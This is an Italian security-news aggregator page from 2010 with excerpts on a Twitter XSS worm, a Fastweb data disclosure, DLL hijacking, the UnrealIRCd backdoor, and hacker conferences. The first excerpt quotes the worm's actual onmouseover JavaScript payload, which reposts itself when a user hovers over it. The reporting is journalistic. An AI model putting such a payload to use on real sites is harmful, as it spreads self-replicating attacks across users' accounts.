Il Bloggatore

XSS su Twitter, siamo a rischio worm

21 settembre 2010 - Fonte: http://www.ihteam.net/blog

E’ di tipo onMouseOver l’XSS che si sta diffondendo a macchia d’olio su twitter proprio in queste ore. Si riconosce immediatamante dal fatto che il twitt ha uno sfondo completamente nero: Il codice che viene richiamato è il seguente: Versione testo: http://a.no/@”onmouseover=”;$(‘textarea:first’).val(this.innerHTML);$(‘.status-update-form’).submit()” style=”color:#000;background:#000;/ Il codice non fa’ niente di speciale se non re-twittare il bug ...

Leggi il seguito »

Nessun commento »

Inserito in Hacking News, IHTeam Security Blog, onmouseover, Twitter, twitter worm, twitter xss

Problemi di privacy per Fastweb Italia

2 settembre 2010 - Fonte: http://www.ihteam.net/blog

Un problema di sicurezza sull’infrastruttura fastweb (ora pienamente risolto) consentiva ad utenti malintenzionati di reperire informazioni riservate di un’utenza avendo a disposizione solo il codice cliente. Vi lascio un paper che spiega tutto: http://www.ihteam.net/papers/fastweb_information_disclosure.pdf PREVIEW: [+] Segnalazione bug avvenuta il 19 Luglio 2010 [+] Bug fixato il 25 Agosto 2010 [+] Rilascio pubblico il 2 ...

Leggi il seguito »

Nessun commento »

Inserito in bug, disclosure, Falla, fastweb, Hacking News, IHTeam Security Blog, privacy

DLL Hijacking cos’è e come funziona

30 agosto 2010 - Fonte: http://www.ihteam.net/blog

DLL (Dynamic-link library) Hijacking è una nuova metodologia di attacco locale sviluppata e perfezionata da HD Moore (sviluppatore di metasploit) che lavora (per ora) solo su Windows. Il principio di funzionamento è semplicissimo: viene sfruttato il meccanismo di caricamento delle DLL di windows. Come sappiamo gli EXE richiamano le DLL su PATH predefinite. Se non ...

Leggi il seguito »

Nessun commento »

Inserito in dll hijacking, Dynamic-link library, exploit, Hacking News, IHTeam Security Blog

End Summer Camp 2010 – 3-5 Settembre, Venezia

26 agosto 2010 - Fonte: http://www.ihteam.net/blog

Quest’anno l’End summer Camp (ESC) si svolgerà dal 3 al 5 Settembre 2010 a Venezia in via Bazzera. Lo schedule è il seguente: 1 Talks&Seminars 1.1 1001 – Hacking Linux VServer with 0day exploits – ascii, jekil <jesus@ush.it> (language: EN/IT) 1.2 1002 – Kicking the bad guys in the ass – nex`, jekil (language: EN/IT) ...

Leggi il seguito »

Nessun commento »

Inserito in 2010, end summer camp, esc, Hack Meet, IHTeam Security Blog

XSS su youtube già pecciato. Allarmismo immotivato in Italia

5 luglio 2010 - Fonte: http://www.ihteam.net/blog

Allarmismo immotivato! E’ l’unica parola che mi viene in mente in questo momento! Oggi è uscio su LaStampa e Repubblica un articolo che allarmava gli utenti inquanto Youtube era stato “hackerato“/”bucato“. Dagli screen che propongono si vede chiaramente che si tratta di un XSS: Tutti sappiamo che grazie ad un XSS è possibile prendere i cookie di un ...

Leggi il seguito »

Nessun commento »

Inserito in 4chan, eBaumsWorld, hacked, Hacking News, IHTeam Security Blog, Justin Bieber, XSS, YouTube

Account iTunes violati! Attenzione alla carta di credito

5 luglio 2010 - Fonte: http://www.ihteam.net/blog

Notizia venuta subito a galla grazie a Twitter ed ai social network (vedi che a qualcosa servono allora . Molti utenti si sono trovati una bolletta dell’Apple store per applicazioni, o meglio ebook, che non hanno mai richiesto! Tutti gli ebook richiesti erano stati prodotti da una società con sede in Vietnam, quindi i probabili ...

Leggi il seguito »

Nessun commento »

Inserito in app store, apple, hacked, Hacking News, IHTeam Security Blog, iTunes

Un anno di backdoor su Unrealircd

13 giugno 2010 - Fonte: http://www.ihteam.net/blog

Notizia di poche ore fa! Unrealircd aveva un backdoor! Dal report fatto dagli sviluppatori sembra che sia stato violato il repository che conteneva la versione 3.2.8.1, così facendo hanno potuto inserire una versione modificata di Unrealircd con backdoor annessa. Tutto questo è stato fatto il 10 Novembre 2009… 7 mesi di download e chissà quanti server IRC ...

Leggi il seguito »

Nessun commento »

Inserito in backdoor, Hacking News, IHTeam Security Blog, UnrealIRCd

Lista di provider VPN gratuiti

20 maggio 2010 - Fonte: http://www.ihteam.net/blog

Questa è una lista dei fornitori di servizi VPN GRATUITI. Ci sono stati molti di più, ma sembra che hanno chiuso bottega. Ecco qua i migliori: 1. JAP / AN.ON – Anonimato . Online / JonDo: “JAP (chiamato JonDo nel campo di applicazione commerciale proxy server anonimi JonDonym – AN.ON rimane gratuito) ...

Leggi il seguito »

Nessun commento »

Inserito in free vpn, Hacking Generico, IHTeam Security Blog, provider vpn, vpn gratis

Hack it 2010 – Roma 2-3-4 Luglio

19 maggio 2010 - Fonte: http://www.ihteam.net/blog

L’Hacker meeting si svolgerà il 2,3 e 4 Luglio 2010 a Roma presso il Centro Sociale Autogestito “La Torre”. Dopo Dieci Anni l’Hackmeeting E di Nuovo a Roma. L’hackmeeting e’ l’incontro delle comunita’, delle controculture digitali e non, e delle individualita’ che si pongono in maniera critica e propositiva rispetto all’avanzare delle nuove tecnologie, ...

Leggi il seguito »

Nessun commento »

Inserito in 2010, hack it, Hack Meet, hacker meeting, HackMeeting, IHTeam Security Blog, roma

Security Summit 2010 – Roma

19 maggio 2010 - Fonte: http://www.ihteam.net/blog

Quest’anno il security Summit si terrà a Roma il 9 e 10 Giugno 2010. PROGRAMMA DEL 9 GIUGNO: Ore 09:45 Sala Da definire: Convegno d’apertura “Sicurezza delle informazioni e della rete: nuove sfide per le istituzioni e le imprese“ Ore 14:30 Sala Da definire: Percorso professionale tecnico “La tutela delle informazioni classificate e l’evoluzione dei Common criteria“ Ore 14:30 Sala ...

Leggi il seguito »

Nessun commento »

Inserito in 2010, Hack Meet, hacker meeting, IHTeam Security Blog, roma, security summit

12 3 4 5 »10...Ultima »

- <a href='http://advertise.ilbloggatore.com/www/delivery/ck.php?n=af7bf9b6&cb=INSERT_RANDOM_NUMBER_HERE' target='_blank'><img src='http://advertise.ilbloggatore.com/www/delivery/avw.php?zoneid=84&cb=INSERT_RANDOM_NUMBER_HERE&n=af7bf9b6&ct0=INSERT_CLICKURL_HERE' border='0' alt='' /></a>
  
  <a href='http://advertise.ilbloggatore.com/www/delivery/ck.php?n=aac6cde3&cb=INSERT_RANDOM_NUMBER_HERE' target='_blank'><img src='http://advertise.ilbloggatore.com/www/delivery/avw.php?zoneid=85&cb=INSERT_RANDOM_NUMBER_HERE&n=aac6cde3&ct0=INSERT_CLICKURL_HERE' border='0' alt='' /></a>
  
  Pronostici Calcio | Previsioni Lotto | Roulette
  Estrazione Euro jackpot
- Iscriviti ai nostri feeds: è gratis! Potrai essere sempre aggiornato su tutte le notizie e le novità provenienti dal mondo informatico! Il tutto IN MODO ASSOLUTAMENTE GRATUITO!!!

Iscriviti gratis alla newsletter

e ricevi una mail al giorno con 20 notizie tratte da
"Il Bloggatore"
Inserisci la tua email:

Ultime Recensioni

I vostri ultimi commenti

Web Designer Monza: Ciao, sarebbe stato interessante ma pare che il blog che forniva una lista dell...
Diego: Da premettere che il commento l'ho scritto due volte perche` non voleva accettar...
pcnewsystems: Indubbiamente oltre ad un buon sito web ci deve essere una buona strategia di ma...
bo: nn funziona lòòl...
Andrea: Carte nautiche navionics...

La classifica:
I blog più attivi

Antipixel e Loghi

<a href="http://www.ilbloggatore.com/" title="Il Bloggatore"><img src="http://images.ilbloggatore.com/ilbloggatore.png" border="0" alt="Il Bloggatore" /></a>

Back to Top

Il presente portale è tutelato dallo Studio Legale Maggesi di Roma - Diritto Internet - Diritto Civile - Diritto Societario